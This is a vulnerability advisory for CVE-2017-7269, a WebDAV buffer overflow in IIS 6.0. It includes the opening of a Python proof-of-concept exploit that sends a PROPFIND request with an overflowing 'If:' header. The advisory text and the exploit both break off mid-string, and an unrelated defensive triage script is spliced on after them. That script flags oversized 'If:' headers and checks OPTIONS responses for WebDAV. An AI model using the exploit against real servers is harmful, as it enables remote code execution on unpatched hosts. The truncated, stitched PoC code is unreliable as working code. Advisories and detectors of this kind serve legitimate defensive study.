IIS 6.0 remote code execution 0day, CVE-2017-7269 (PoC attached)

Vulnerability description
CVE ID: CVE-2017-7269
Discovered by: Zhiniang Peng and Chen Wu (Information Security Lab, School of Computer Science & Engineering, South China University of Technology)
Summary: IIS 6.0 with the WebDAV service enabled contains a buffer overflow that leads to remote code execution. It is currently exploitable reliably on Windows Server 2003 R2, and was first seen exploited in the wild around July and August 2016.
Vulnerability type: buffer overflow
Severity: high
Affected products: IIS 6.0 with WebDAV enabled on Microsoft Windows Server 2003 R2 (verified; other versions not yet verified)
Trigger function: ScStoragePathFromUrl
Additional information: ScStoragePathFromUrl is called twice
Details: the ScStoragePathFromUrl function in the WebDAV service of IIS 6.0 on Windows Server 2003 contains a buffer overflow; an attacker triggers it with a request header that begins with "If:
PoC (source: https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py)
#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#-----------Email: edwardz@foxmail.com
import socket

# Connect to the target (the PoC assumes a local IIS 6.0 instance on port 80)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1',80))

# PROPFIND request; the overflow is carried in the "If:" header that follows
pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay+='If:
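The PoC above sends a WebDAV PROPFIND whose "If:" header carries the overflow. The following is an added example, not code from the advisory or from the PoC authors' repository: a small triage helper that (1) parses raw HTTP requests and flags WebDAV requests whose "If:" header is far longer than any legitimate lock-token or ETag list, the shape the PoC uses, and (2) reads an OPTIONS response to decide whether a server advertises WebDAV at all, i.e. whether the vulnerable code path is reachable. The length threshold IF_HEADER_MAX_LEN, the function names and all sample messages are constructed assumptions.

```python
"""Triage helpers for CVE-2017-7269 (added example; not the advisory's or the
PoC authors' code). The threshold and sample messages are assumptions."""
from typing import Dict, List, Optional, Tuple

# Assumption: benign "If:" headers (RFC 4918 lock tokens / ETags) stay short;
# anything beyond this is treated as an overflow attempt. Tune per environment.
IF_HEADER_MAX_LEN = 256

# Methods that only exist when WebDAV is enabled on the server.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}


def _parse_head(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP/1.x message into its start line and a header dict.

    Header names are lower-cased; repeated headers are folded with ", " so a
    value split across several "If:" lines is measured as a whole.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # malformed line; nothing to measure
        name, value = line.split(":", 1)
        key, val = name.strip().lower(), value.strip()
        headers[key] = f"{headers[key]}, {val}" if key in headers else val
    return lines[0], headers


def classify_request(raw: bytes) -> Optional[str]:
    """Return a finding for a request that looks like an attack on the WebDAV
    "If:" parser, or None for a request that looks benign."""
    start, headers = _parse_head(raw)
    parts = start.split(" ")
    if len(parts) < 3:  # HTTP/1.x request line needs method, target, version
        return "malformed request line"
    method = parts[0].upper()
    if method not in WEBDAV_METHODS:
        return None  # the vulnerable code path is only reached via WebDAV methods
    if_value = headers.get("if")
    if if_value is None:
        return None
    if len(if_value) > IF_HEADER_MAX_LEN:
        return f"{method} with {len(if_value)}-byte If: header (limit {IF_HEADER_MAX_LEN})"
    return None


def scan_requests(requests: List[bytes]) -> List[Tuple[int, str]]:
    """Run classify_request over a capture and return (index, finding) pairs."""
    findings = []
    for idx, req in enumerate(requests):
        finding = classify_request(req)
        if finding is not None:
            findings.append((idx, finding))
    return findings


def webdav_exposed(options_response: bytes) -> bool:
    """Given a raw OPTIONS response, report whether the server advertises WebDAV.

    RFC 4918 servers announce compliance in a "DAV:" header, and "Allow:" lists
    the WebDAV methods; either is taken as WebDAV being enabled.
    """
    _status, headers = _parse_head(options_response)
    if "dav" in headers:
        return True
    allowed = {m.strip().upper() for m in headers.get("allow", "").split(",")}
    return bool(allowed & WEBDAV_METHODS)


# Constructed samples. SAMPLE_SUSPICIOUS only mimics the *shape* of the PoC
# request (PROPFIND plus an oversized "If:" header); the padding is not the
# exploit payload.
SAMPLE_BENIGN = (
    b"PROPFIND /docs/ HTTP/1.1\r\nHost: localhost\r\nDepth: 1\r\n"
    b"If: <urn:uuid:e71d4fae-5dec-22d6-fea5-00a0c91e6be4>\r\n\r\n"
)
SAMPLE_SUSPICIOUS = (
    b"PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n"
    b"If: <http://localhost/" + b"a" * 2000 + b">\r\n\r\n"
)
SAMPLE_OPTIONS_WEBDAV = (
    b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/6.0\r\nDAV: 1, 2\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    b"PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n\r\n"
)
SAMPLE_OPTIONS_PLAIN = (
    b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/6.0\r\n"
    b"Allow: OPTIONS, GET, HEAD, POST\r\n\r\n"
)

if __name__ == "__main__":
    for idx, finding in scan_requests([SAMPLE_BENIGN, SAMPLE_SUSPICIOUS]):
        print(f"request {idx}: {finding}")
    print("WebDAV exposed:", webdav_exposed(SAMPLE_OPTIONS_WEBDAV),
          webdav_exposed(SAMPLE_OPTIONS_PLAIN))
```

The length check is a heuristic for triage of captures or proxy logs, not a substitute for a fix; since the advisory's precondition is WebDAV being enabled, a server for which webdav_exposed() returns True and that runs IIS 6.0 on Windows Server 2003 R2 should have WebDAV disabled until it can be patched.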